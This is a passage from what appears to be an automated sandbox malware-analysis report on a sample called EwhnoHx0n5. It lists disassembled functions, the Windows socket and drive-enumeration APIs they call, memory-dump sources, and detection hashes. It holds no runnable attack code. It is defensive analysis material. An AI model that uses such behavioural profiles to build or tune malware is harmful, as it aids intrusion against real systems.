                                                        • getsockname() failed with errno %d: %s, xrefs: 0048A1F0
                                                        • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0048A23B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: getsockname
                                                        • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                        • API String ID: 3358416759-2605427207
                                                        • Opcode ID: e332525133326d9d474adb34e3a5527a13d4dd12853c6e558849fc4f932e5864
                                                        • Instruction ID: ca09d8cb5384c57384fcb1e33c425dfbe44ac0ea4c5f259f10d8c991d6051c33
                                                        • Opcode Fuzzy Hash: e332525133326d9d474adb34e3a5527a13d4dd12853c6e558849fc4f932e5864
                                                        • Instruction Fuzzy Hash: B3210631848680BAF621AB19DC46FE773ACEF81328F040656F98853151FE76698687E7
                                                        Function 0046D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WSAStartup.WS2_32(00000202), ref: 0046D65B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: Startup
                                                        • String ID: if_nametoindex$iphlpapi.dll
                                                        • API String ID: 724789610-3097795196
                                                        • Opcode ID: becc2da6df6210129f1befc57d4c18f54644d715835a36845c6f79d3c34836bb
                                                        • Instruction ID: 61ea48ee72e3839294c16bca7112e7bb962ebf6b16e721b72b62ea1410b1b1eb
                                                        • Opcode Fuzzy Hash: becc2da6df6210129f1befc57d4c18f54644d715835a36845c6f79d3c34836bb
                                                        • Instruction Fuzzy Hash: D9012690E8438117EB217B3CED1B36725E05B56708F84186AE848963D6FB3DC989C2A7
                                                        Function 0051AA30 Relevance: 4.9, APIs: 3, Instructions: 377networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0051AB9B
                                                        • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0051ABE4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: ioctlsocketsocket
                                                        • String ID:
                                                        • API String ID: 416004797-0
                                                        • Opcode ID: fbb30cf27391800e1b34a16f456e00dd661c4fedf85fa87ba5d7146879002b90
                                                        • Instruction ID: b917917152af15fb369918e85340a240081759504651cd0c1ec61758cda191f3
                                                        • Opcode Fuzzy Hash: fbb30cf27391800e1b34a16f456e00dd661c4fedf85fa87ba5d7146879002b90
                                                        • Instruction Fuzzy Hash: EEE1F2706053429BFB21CF24C885BAB7BE5FF85314F044A2DF9988B291E775D984CB92
                                                        Function 071B0385 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 227COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\
                                                        • API String ID: 999431828-3379428675
                                                        • Opcode ID: 8f876e37ca3e87e43e1221ac7b530a902baca5aee31a099edb1b51e70764c1f2
                                                        • Instruction ID: 023f33a6070ff4840f902f7392f8cbe7aab68aeb9695774ec5334d20b32d532a
                                                        • Opcode Fuzzy Hash: 8f876e37ca3e87e43e1221ac7b530a902baca5aee31a099edb1b51e70764c1f2
                                                        • Instruction Fuzzy Hash: 8A41E6FB22C111BE722A81552B659FB676DE5CF730B328937F403D69C2E3984A8D5032
                                                        Function 071B03B2 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 213COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\
                                                        • API String ID: 999431828-3379428675
                                                        • Opcode ID: 9416cf7c5c8d1ecaf6eaa1d34bf2153f50eb2462fae42c64003d32c78beb6915
                                                        • Instruction ID: 639e08a64b37c244df0de7c8e31483dc4ffb966eb4fcc34a504ea0a0a69b463a
                                                        • Opcode Fuzzy Hash: 9416cf7c5c8d1ecaf6eaa1d34bf2153f50eb2462fae42c64003d32c78beb6915
                                                        • Instruction Fuzzy Hash: 7F41F8F722C111FD722A85552B549FB676DE5CF730B328577F803D6981E3984A8D5032
                                                        Function 071B0423 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 202COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 071B0456
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\
                                                        • API String ID: 999431828-3379428675
                                                        • Opcode ID: 0e69513b3e4042112912b7b33152124596bfba44063e6b7319be1930b68ea081
                                                        • Instruction ID: 9a82125e35ac71a09a853164140da7aa05f087a0e8d14829c8eff97b23eec08c
                                                        • Opcode Fuzzy Hash: 0e69513b3e4042112912b7b33152124596bfba44063e6b7319be1930b68ea081
                                                        • Instruction Fuzzy Hash: 7741E6F722C111BD722A85562BA59FB676DE5CF730B328977F403C6A81E3984E8D5032
                                                        Function 071B0407 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 186COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\
                                                        • API String ID: 999431828-3379428675
                                                        • Opcode ID: 63095e0af155b2392165d95f18a0b0722c186d019884c640b1c2a3e1472cb14f
                                                        • Instruction ID: 1fab2dbf10e3551ae689198ba807c5c7670c88e15019b30eab70dd8b8cea53d2
                                                        • Opcode Fuzzy Hash: 63095e0af155b2392165d95f18a0b0722c186d019884c640b1c2a3e1472cb14f
                                                        • Instruction Fuzzy Hash: C33126FB22C111BD722A81552BA45FB676DE5CF730B328977F403C6AC1E3984A895032
                                                        Function 071B0466 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 160COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 071B0456
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\
                                                        • API String ID: 999431828-3379428675
                                                        • Opcode ID: 21f2a0f2b0a86c37fae04142b757921c47dd8c6a4e153ab874e7695ed9010378
                                                        • Instruction ID: fbd65dda52adc20d8ece432eafce41ecea050d060c66f229613d6fb68078d633
                                                        • Opcode Fuzzy Hash: 21f2a0f2b0a86c37fae04142b757921c47dd8c6a4e153ab874e7695ed9010378
                                                        • Instruction Fuzzy Hash: B33128F722C111AD722985552BA05FB576DE6CF370F33896AF403C2AC1E3944E895032
                                                        Function 071B044E Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 153COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 071B0456
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\
                                                        • API String ID: 999431828-3379428675
                                                        • Opcode ID: 0e1ddbe7863af54990a07fe3b20426d0c8dd18148aef637c6c9565e35c0e764a
                                                        • Instruction ID: dc18da937285b01c0b891ec4608eb054c39a5e3dc8b565ffd747d2ca32fa4953
                                                        • Opcode Fuzzy Hash: 0e1ddbe7863af54990a07fe3b20426d0c8dd18148aef637c6c9565e35c0e764a
                                                        • Instruction Fuzzy Hash: D231E4E722C111ED722A85552BA05FB576DE5CF730B338566F803D6AC1E3984B895032
                                                        Function 004578B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: closesocket
                                                        • String ID: FD %s:%d sclose(%d)
                                                        • API String ID: 2781271927-3116021458
                                                        • Opcode ID: 0f8a2118b6adf39e5c33f7d8012a886f93e8aea86e83cf02f1dcae4bf1bc0e20
                                                        • Instruction ID: 19a1c6f26075e096aa1c438618c2e3e23f6359334facecf19c92f476ad6d90c8
                                                        • Opcode Fuzzy Hash: 0f8a2118b6adf39e5c33f7d8012a886f93e8aea86e83cf02f1dcae4bf1bc0e20
                                                        • Instruction Fuzzy Hash: 61D05E329192313B852069997C49C4B7BA8DDC6F61F064CADFD4067205D2209D0487E2
                                                        Function 0051B060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0051B29E,?,00000000,?,?), ref: 0051B0BA
                                                        • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00503C41,00000000), ref: 0051B0C1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastconnect
                                                        • String ID:
                                                        • API String ID: 374722065-0
                                                        • Opcode ID: a2be62084570a709f5b69b76195bff6e4f985fafbdc377df36b86ad4d4c0f579
                                                        • Instruction ID: 480315afb0c158adbb34df1a2f3942a6cf1a4b74aecb400980cbcdc5baf2af67
                                                        • Opcode Fuzzy Hash: a2be62084570a709f5b69b76195bff6e4f985fafbdc377df36b86ad4d4c0f579
                                                        • Instruction Fuzzy Hash: 9101DD356042009BFA205A658C88EE7B795FF8D364F040B58F578531D1D726DD904751
                                                        Function 00504950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • gethostname.WS2_32(00000000,00000040), ref: 00504AA4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: gethostname
                                                        • String ID:
                                                        • API String ID: 144339138-0
                                                        • Opcode ID: ffa2c842f42a29ccd441f35887621a88c763069d5b5d9e7222b0b7b27775cf6d
                                                        • Instruction ID: 161d125c369d3fefa4f290ac99b7d23939a1bb86ea0c2f082044e602cfcd55bf
                                                        • Opcode Fuzzy Hash: ffa2c842f42a29ccd441f35887621a88c763069d5b5d9e7222b0b7b27775cf6d
                                                        • Instruction Fuzzy Hash: E551CEF06047009BEB309B69DE4972B7AE4BF45319F14093CEA8A866E1E774E844CF12
                                                        Function 0051AF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • getsockname.WS2_32(?,?,00000080), ref: 0051AFD1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: getsockname
                                                        • String ID:
                                                        • API String ID: 3358416759-0
                                                        • Opcode ID: 1bf5d981ab41217f18df95ecf0209de6ad4f35f53ae087fd55ede6b6a078e12c
                                                        • Instruction ID: f68ca60419587c0d3464679b5ef9660aa56cdeb288609c494a31ec1e4ca2d4dd
                                                        • Opcode Fuzzy Hash: 1bf5d981ab41217f18df95ecf0209de6ad4f35f53ae087fd55ede6b6a078e12c
                                                        • Instruction Fuzzy Hash: 3F11667080878595FB268F18D4067F6B7F4FFD4329F109A19E59942150F7729AC68BC2
                                                        Function 0051A920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0051A97E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: send
                                                        • String ID:
